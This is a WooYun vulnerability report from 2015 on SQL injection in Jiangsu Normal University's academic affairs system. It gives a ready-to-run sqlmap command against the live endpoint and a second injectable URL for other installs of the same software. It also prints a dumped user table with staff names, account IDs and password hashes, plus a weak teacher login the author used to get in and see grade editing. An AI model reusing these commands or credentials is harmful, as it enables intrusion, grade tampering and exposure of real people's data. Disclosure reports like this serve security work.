当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115193

漏洞标题:江苏师范大学教务系统存在管理员权限SQL注入可执行xp_cmdshell

相关厂商:江苏师范大学

漏洞作者: 冰麒麟

提交时间:2015-05-20 18:22

修复时间:2015-05-25 18:24

公开时间:2015-05-25 18:24

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:3

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

似乎是开放了多余的功能,并没有在使用这套系统的其他学校找到这个漏洞文件

详细说明:

sqlmap -u "http://bkjw.jsnu.edu.cn/other/findmm.aspx" --data "__VIEWSTATE=%2FwEPDwUKMTM3MDMyNTgxMQ9kFgICAw9kFgICCQ8PFgIeBFRleHRlZGRkDT0lfg003PEJouDc7Ib%2FVQuuzVE%3D&__EVENTVALIDATION=%2FwEWBgLj84i4CQLor%2FPuDAL3r%2FPuDAKBmOPQBQKcgYHmDwKM54rGBsV344zSHNaXohGFz7uP0KRd%2FDWW&ddllx=1&tb1=110&tb2=110&Button1=+%D5%D2+%BB%D8+" -p "tb1" --dbs


QQ截图20150520162734.png


QQ截图20150520163114.png


QQ图片20150520164250.png


既然是教务系统那么学生资料肯定是会有的,这里只跑了一下管理员表

USER_ID,USER_CREATOR_ID,USER_MODIFIER_ID,ISKYX,YXKZLX,EJSQBZ,KCZYXDM,PAGESIZE,KCZJYSDM,USER_EMAIL,USER_ENABLE,USER_PASSWD,USER_ACCOUNT,USER_END_TIME,USER_REAL_NAME,USER_PWD_EMAIL,USER_START_TIME,USER_MODIFY_TIME,USER_PWD_ANSWER2,USER_PWD_ANSWER1,USER_CREATE_TIME,USER_ACCOUNT_TYPE,USER_PWD_QUESTION2,USER_PWD_QUESTION1,USER_LAST_LOGIN_TIME,USER_LAST_LOGIN_DATE
16,NULL,1796,1,NULL,NULL,NULL,500,NULL,<blank>,1,uWOw9EUfPPsB4ckWqKb71A==,admin,NULL,系统管理员,<blank>,NULL,12 \\?a0\\?39 2009 \\?a0\\?32:40PM,<blank>,<blank>,NULL,super,<blank>,<blank>,10:19:8,2015/5/8
1860,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,836qibcz/UTsQ7IbmLbrhg==,182089,NULL,张成福,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,16:59:23,2015/3/1
1861,NULL,NULL,NULL,NULL,NULL,NULL,60,NULL,NULL,1,dErAJs7Nrz9PtVh458/ltA==,185091,NULL,蒋岱,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,11:20:30,2015/4/13
1862,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,ku7/rlEqP04aNroWdJSsjQ==,186025,NULL,鲁斌宏,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,23:37:34,2013-6-30
1863,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,QbpmzuwIiEkReo3e61Pkxg==,189086,NULL,杜文霞,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,13:6:44,2015/1/22
1864,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,yllV1tqqQokvGWzAIdZ0xQ==,189100,NULL,周建萍,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,14:11:39,2015/3/24
1865,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,ZMTsdt9OhNWasGT8K28Qrw==,189159,NULL,李申,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,9:24:58,2010-6-7
1866,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,PEiGR+1YnIgU031T6WNd9w==,189187,NULL,朱存明,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,NULL,NULL
1867,NULL,NULL,NULL,NULL,NULL,NULL,15,NULL,NULL,1,UQkSdzK9f2x1esNSWqMoZQ==,189275,NULL,于为苍,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,18:38:55,2015/1/24
1868,NULL,NULL,NULL,NULL,NULL,NULL,15,NULL,NULL,1,r6EkJ0R/l68IEhDMTsbMEA==,190007,NULL,张卫中,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,10:39:48,2014/12/23
1869,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,uSK6AUZZP4mMhAdIjsol+A==,192058,NULL,乔秋颖,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,23:37:37,2015/5/7
1879,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,FX51bYJGw6PCjvyV65U2gw==,01012,NULL,胡伟,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,NULL,NULL
1880,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,OYGNhuaWetGsC67IUdxNJQ==,01013,NULL,邓星雨,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,17:23:29,2011-6-22
1881,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,HBumjSpsCFCsQJR2LC3ANg==,195009,NULL,叶正渤,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,15:12:5,2015/1/16
1882,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,xC3xaNQZKbcUFkvoM1b6Ig==,195015,NULL,张文德,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,13:25:35,2015/3/11
1883,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,phZCG+myP2p/qhRMBflY7Q==,195032,NULL,沈玲,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,15:18:59,2012-11-9
1884,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,wPEiotbz39aUjToPag/y3Q==,195033,NULL,田崇雪,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,10:37:7,2014-1-17


密码没解出来随手打个弱口令进去了
182089/182089

QQ截图20150520165002.png


这里可以改成绩,但是教师权限很小 似乎只能改自己教的科目

QQ截图20150520165049.png


就到这里吧,顺便附赠一个这个系统的通用注入,需要学生帐号登录。

http://url/JWXS/xsxk/xsxk_zlgl_jstd.aspx?Zj=201420001489&TzdId=201420001489&kcmc=%cf%df%d0%d4%b4%fa%ca%fd&xnxqh=2014-2015-2&kcdm=00250&actionSrc=

参数xnxqh报错注入,然而并没有什么软用

漏洞证明:

同上

修复方案:

完全不明白

版权声明:转载请注明来源 冰麒麟@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-25 18:24

厂商回复:

最新状态:

暂无


漏洞评价:

评论